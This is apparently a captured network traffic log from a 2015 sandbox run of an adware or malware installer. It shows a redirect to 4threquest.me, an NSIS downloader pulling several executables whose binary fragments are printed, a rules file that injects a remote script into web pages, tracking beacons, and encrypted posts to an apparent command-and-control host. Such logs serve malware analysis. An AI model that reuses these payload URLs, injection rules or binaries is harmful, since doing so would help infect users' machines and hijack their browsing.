CF-RAY: 1df6edbc30fe046d-FRA
0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141125000000Z0.0...U.......0*........%..@...141125000000Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t.T_.....Y.R......p OS..2.s........(C.e.x3.#.d6L.d=.UI.;T..G...mx....... .......-........-.....J....$.Ko.e#......3....*..3.s...0.........N..W?'.U...f..h..e...m.9.HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:56 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 594..Connection: keep-alive..Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-age=6482884..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudflare-nginx..CF-RAY: 1df6edbc30fe046d-FRA..0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141125000000Z0.0...U.......0*........%..@...141125000000Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t
<<< skipped >>>
GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119928, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:15:51 GMT
Expires: Sat, 02 May 2015 10:15:51 GMT
ETag: "b2a2c0ce8f0f9b25572e41e1706cd0a01fa1f1ef"
Content-Length: 1741
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G2..20150430221551Z0d0b0:0... .........#o..K......#..... ...:....g(.....An ............20150430221551Z....20150502101551Z0...*.H.............oI..C>./|..o.....{.#..C....a.......V. H..j"P.....*M:m...&...s.....5/|49..|.....N....6..{.Z...H.I,..(...,....\k..w.%A....@.......)f.>:.;..^. .k...}.]._...?=bF?.....J.:.O.$.. .N..O.......Bg......9....UYx.".....\..W..]L..0.I_.....g..f..I.8....K^.;....oK.R........0...0...0..q..........t....o0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p.........0..0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0@..U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H.............bW%D.2.X..U[0d..........|.BaG.Y.?.u...\...M..
<<< skipped >>>
GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {. . ApiBlock = false;. //document.write(unescape(""));. . document.write(unescape(""));. . . . document.write(unescape(""));. function MobiMidia_addOption(selectId, txt, val, selected) {..var objOption = new Option(txt, val, selected);..self.document.getElementById(selectId).options.add(objOption);. }. function MobiMidia_keyNumber(e) {. if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);. filteredValues = "1234567890";. if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;. }. }. function MobiMidia_AtivaCel() {. if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {. self.document.getElementById('MobiMidia_Number').focus();. }. }. . function MobiMidia_NonoDigito() {. if (self.document.getElementById('MobiMidia_DDD').value < 30) {.
<<< skipped >>>
GET /ironsrc_prot.png?nocache=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: desprotetordelinks.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:09 GMT
Content-Type: image/png
Content-Length: 14566
Connection: keep-alive
Last-Modified: Mon, 16 Mar 2015 23:54:21 GMT
ETag: "5720b2-38e6-5117091a3e540"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
.PNG........IHDR...&.........2.K.....pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Thu, 30 Apr 2015 23:11:15 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT..ETag: "804047d4e66d01:0"..Cache-Control: max-age=86400..Date: Thu, 30 Apr 2015 23:11:15 GMT..Connection: keep-alive..
GET /310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 36948
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s....... ...............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc........ .......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 688202
Last-Modified: Sat, 11 Apr 2015 13:41:40 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................@.............@.................................N............@..............................P.......T...........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...T...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523272
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z....... ...0.......p....@.......................... ...............................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......p...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....nD..H.P.u..u..u...Hr@..B...SV.5.nD..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
GET /310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U.................<...T......3o.......P....@..................................t....@..................................i..........................`........;..`S..8............................D..@............P...............................text....:.......<.................. ..`.rdata...(...P...*...@..............@..@.data....g.......F...j..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..V...y-...E..t.V..6.......^]...................O-.............U..j.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,..h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>
GET /310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 101527
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_cp.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................................................................p...............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata.......p...........................rsrc........p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 401 Unauthorized
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
0......
GET /310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x....u...u...u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u.......u.......u.......u.Rich..u.........................PE..L......T..........................................@.......................................@..................................|..........(........................)..................................xR..@...............L............................text............................... ..`.rdata..............................@..@.data....:...........v..............@....rsrc...(...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................................................j...4...............................t.j.j.j.P....D...P....D.....................3.9.................t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D...P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..................=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.d......E..}....LD......3.3..O.._.f.W..]..O8._4f.W$.w@.E...N.3..^.f.....Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x............................................_l._p.......Gh....._`._d.........
<<< skipped >>>
GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 30 Apr 2015 23:07:04 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ....HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Cache-Control: no-cache, no-store, max-age=0, must-revalidate..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Date: Thu, 30 Apr 2015 23:07:04 GMT..Location: hXXp://VVV.4threquest.me/registro/310113f8.htm..Content-Encoding: gzip..X-Content-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Content-Length: 191..Server: GSE..Alternate-Protocol: 80:quic,p=1............m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ......
GET /v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.97 ms","message":"store 3 action and 5 update "}..0......
GET /v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}..0..
GET /services/rules.txt?dummy=328 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:24 GMT
Content-Type: text/plain
Content-Length: 197
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT
ETag: "57c94d-c5-514f84ca6d480"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.ncupons|nncupons.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:24 GMT..Content-Type: text/plain..Content-Length: 197..Connection: keep-alive..Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT..ETag: "57c94d-c5-514f84ca6d480"..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..Accept-Ranges: bytes..</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.ncupons|nncupons.....
GET /services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:25 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..
POST /?v=1.03&c=04dec24f&at=620310157&cntr=0 HTTP/1.1
Accept: */*
Host: info.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 152
Cache-Control: no-cache
6l7GU7LYt04pVHc/00d7JpnsyIlcQScF0Zt4fhTcnqAudVVTHAkQvjbNdQcTQVWncSm617pM7dCpzGdczEzIc45kZsS9dv8pqDIWlb4QaSVK72mxtb2fZpL7YThHh9D3L7nkLApli1btouR P4d9XA==
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Length: 960
Connection: keep-alive
DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/TXb0sY3O7zhC8yQbJGORLjeg98mwuB1wGZCDc0Aj/F3Zev9Vec7Xr5Hsf8aSuQ2bbZP dKcxWjvFYPpexl8WtLO4UCI1EVzoWHYDm 1MOVn5taYtzqq13oFvaK7vfUAGfmgYHuaf8nTzRS0IJa3NbpvROTAeUWpTusaRSIQGtT515hc4341dTvNLK6u7VukLbxWVLKHIvMfZxubP/QYujEjiwf21K7 nZaEMEMpGlY6FmD5C63YKyNopqYXsse8r30p4l/F dsOQQRPRKkPGO4y/BookvwEQiDzf1pe2q1nbgrTdPVb/lGdzLChzCkf gIGsN68p2gY7EG49xG4YSAzyhVekJp1DlFbC7i pvbD1XZKMAVJkbtO0PcxgnPmBaC3le7ZevUcf1huI2frYfKNL2h/8nZaenjFhjI26t DtNle9mPkB BhKGXLYoDm 2zRNxP/TAziyXOTC viDy83WtyHCQiBD/jtxSnF5f /GkNFn9wIpc1o6DVebDdHlMmEHTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Thu, 30 Apr 2015 23:07:06 GMT..Content-Length: 960..Connection: keep-alive..DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/T
<<< skipped >>>
